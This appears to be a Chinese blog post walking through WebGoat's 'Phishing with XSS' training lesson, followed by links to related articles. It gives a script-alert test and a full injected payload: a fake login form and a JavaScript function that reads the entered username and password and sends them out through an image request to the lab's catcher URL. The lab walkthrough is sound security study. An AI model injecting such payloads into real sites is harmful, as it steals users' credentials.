【WebGoat笔记】--- Cross-Site Scripting(XSS)

最新推荐文章于 2024-03-15 13:16:56 发布
最新推荐文章于 2024-03-15 13:16:56 发布
阅读量2.5k 收藏 1
点赞数
分类专栏: WebGoat 文章标签: scripting credentials login javascript chrome 语言

 

目标:

伪造一个登陆界面,要求用户输入用户名和密码,将数据提交到http://localhost/WebGoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE

 

解决步骤:

首先:随意输入搜索内容,如:123.


打开源代码,检测是否有未关闭的标签。由于这是一个入门级的练手任务,代码漏洞百出,这一层就不用考虑了。

第二步:尝试在搜索栏中插入JavaScript代码,比如通用的:<script>alert("XSS!");</script>

成功报出提示信息:

值得注意的是,JS脚本语言的插入在我的机器上只能用IE实行,在chrome上则没有任何反应。可能是chrome所用脚本语言有所区别。

 

第三步:构造代码,伪造一个登陆界面:

<form><br><br><HR><H3>Thisfeature requires account login:</H3 ><br><br>EnterUsername:<br><input type="text" id="user"name="user"><br>Enter Password:<br><inputtype="password" name = "pass"><br><inputtype="submit" name="login" value="login"οnclick="hack()"></form><br><br><HR> 
其中,οnclick="hack()"是用户点击登录之后的按钮行为,具体函数在随后构建。


第四步:继续完善欺骗代码,构建JS函数,将获取的用户名和密码提交到相应的链接上。最后的输入代码如下:

<script>functionhack(){alert("Had this been a real attack... Your credentials were juststolen. User Name="+document.forms[1].user.value+"Password="+document.forms[1].pass.value);var XSSImage=newImage();XSSImage.src="http://127.0.0.1:8080/WebGoat/catcher?PROPERTY=yes&user="+document.forms[1].user.value + "&password=" +document.forms[1].pass.value + "";}</script><form><br><br><HR><H3>This featurerequires account login:</H3 ><br><br>EnterUsername:<br><input type="text" id="user"name="user"><br>Enter Password:<br><inputtype="password" name = "pass"><br><inputtype="submit" name="login" value="login"οnclick="hack()"></form><br><br><HR> 

这样,当被欺骗的用户输入用户名和密码之后,将报出提示信息,并将用户名和密码发送到相应链接。

webgoat的提示说,如果创建一个image:XSSImage=newImage(),并声明XSSImage.src=SOME_URL那么JavaScript会执行一个提交。对JS语言不熟,这个今后再研究。

 

荷叶晓帆
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
WebGoat实验之Cross-Site ScriptingXSS,跨站脚本攻击)- 2016.01.09
baishileily的博客
01-09 4835
XSS(Cross-Site Scripting)跨站脚本攻击,由于 html 和 js 都是解释执行的,那么如果对用户的输入过滤不够严格或者说不严格处理,那么当用户也输入一些 html 或者 js 的并被浏览器再次加载的时候也是可以被浏览器解释执行的。那么对于一些博客、贴吧等存在用户输入、又存在游客查看评论的地方,做好用户输入的过滤就很有必要。那么 XSS 能干什么呢?不仅可以用来进行钓鱼攻击,
WebGoat (A7) Cross Site Scripting (XSS)
箭雨镜屋
03-21 3042
第2页 虽然这页好简单,但是强迫症不写就是不爽╮(╯-╰)╭ 这页问了个问题:WebGoat范围内多个页面cookie是否一样? 虽然很想直接yes,但还是走一遍流程吧 第1个页面,打开开发者工具(我用的chrome),在Console输入document.cookie 发现cookie是"JSESSIONID=KDno80WzTKHgbTZZ2SP0-xQmVR7M5m5GTNGHHrBp" 第2个页面,打开开发者工具,在Console输入alert(document.cookie
WebGoat笔记】之四 --- Cross-Site Scripting (XSS)
weixin_30532369的博客
06-21 252
主要内容 保存,反射型Xss,CSRF及HttpOnly的特性 Phishing with XSS LAB: Cross Site Scripting Stage 1: Stored XSS. Stage 2: Block Stored XSS using Input Validation Stage 3: Stored XSS Revisited Stage 4: ...
webgoat-Cross Site Scripting XSS 跨站脚本攻击
seanyang_的博客
11-28 1039
本节课讲述了什么是XSS,并使用XSS执行那些非开发者本意的任务。
webgoat-server-8.2.1
09-02
webgoat-server-8.2.1
webgoat-container-7.1-exec.jar
08-30
WebGoat是OWASP(Open Web Application Security Project)开发的用于Web漏洞演示与验证的平台。该平台包含了访问控制、AJAX安全、认证失效、缓冲区溢出、代码质量、并行性、XSS、不正确的错误控制、注入缺陷、DoS、...
webgoat-server-8.0.0.M17
09-02
webgoat-server-8.0.0.M17
webgoat-server-8.0.0.M21.zip
07-18
这个"webgoat-server-8.0.0.M21.zip"文件包含了WebGoat的第8.0.0.M21版本,这是一个用于学习和实践Web应用安全攻防的环境。下面将详细介绍该版本的相关知识点。 一、WebGoat简介 WebGoat是由OWASP(Open Web ...
WebGoat下Cross-Site Scripting (XSS)实现
南七技校的“好好学生”
06-17 578
一、WebGoat开发版配置二、具体过程 1.
WebGoat系列实验Cross-Site Scripting (XSS)
weixin_30578677的博客
09-18 496
WebGoat系列实验Cross-Site Scripting (XSS) PhishingTitle 本次实验是在一个已知存在XSS漏洞的页面进行钓鱼攻击。通过使用XSS与HTML注入,在页面注入身份认证html代码,添加javascript脚本收集身份认证信息,并发送到http://localhost:8080/WebGoat/catcher?PROPERTY=yes... 输入以下jav...
Webgoat 笔记总结-Cross-site-scripting
weixin_34348805的博客
10-03 249
Cross-Site Scriptingxss) Phishing with XSS 网络钓鱼与xss 使用<script>alert('xss')</script> 测试 使用<script>function hack(){ alert("Had this been a real attack... Your creden...
WebGoat学习——跨站脚本攻击(Cross‐Site Scripting (XSS))
weixin_33690963的博客
06-21 545
跨站脚本攻击(Cross‐Site Scripting (XSS)) XSS(Cross Site Script)跨站脚本攻击。是指攻击者向被攻击Web 页面里插入恶意html代码,当用户浏览该页之时,嵌入其的HTML代码会被执行,从而达到攻击的特殊目的。XSS和CSRF(Cross site request forgery)合称Web 杀手组合。黑客洞穿页面逻辑,使输入的内容被...
【翻译+题解】WebGoat (A7) Cross Site Scripting (XSS) 跨站脚本
最新发布
http://kk888.me/
03-15 1967
跨站脚本(通常也称为 XSS)是一种漏洞/缺陷,它允许将 html/脚本标记作为输入,未经编码或消毒就呈现在浏览器
WebGoat5.4 Cross-Site Scripting (XSS) 开发版本关卡 通关攻略
weixin_46356548的博客
12-27 3700
本人在学习WebGoat5.4时,发现有些题目需要在开发版本上完成,网上能找到的所谓的通关教程,都说这些题目做不了,经过尝试发现,其实是可以完成的,本篇将对这部分进行重点说明。
OWASP Cross-Site Scripting (XSS) 思路笔记
isinstance的博客
02-17 1988
本此实践的WebGoat版本如下所示Phishing with XSSLesson Plan Title: Phishing with XSS(网络钓鱼与 XSS)这个看题目就知道要我们做什么了,主要就算通过XSS来让受害者输入自己的邮箱和密码来达到钓鱼的结果It is always a good practice to validate all input on the server side.
Cross-Site Scripting XSS 跨站攻击全攻略
Programmer.Wenlong 小龙在线
07-08 493
原文:http://a1pass.blog.163.com/blog/static/2971373220087295449497/ 题记:这是我在《黑客X档案》08年第5期发表的一篇文章,对跨站与挂马做了比较全面而深入的讲解。 转载请注明版权:http://a1pass.blog.163.com/ A1Pass 《黑客X档案》 黑客反病毒论坛 http://bbs.hackav.c...
Webgoat - xss
hee_mee的博客
07-16 1161
ZeroNil
WebGoat实验-XSS(跨站脚本攻击)
王二牛放小的博客
05-18 3912
信安实验,安排在WebGoat上面的XSS实验。简单记录一下实验过程。 Stage 1: Stored XSS(存储XSS攻击) 实验内容:主要是用户“Tom”(攻击者)在自己的个人资料添加了恶意代码(比如最简单的alert('121212');),然后保存。在被攻击者“Jerry”查看Tom的资料的时候,会执行Tom写的恶意代码。 步骤: 首先Tom登录,在自己资料(ViewProfi
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值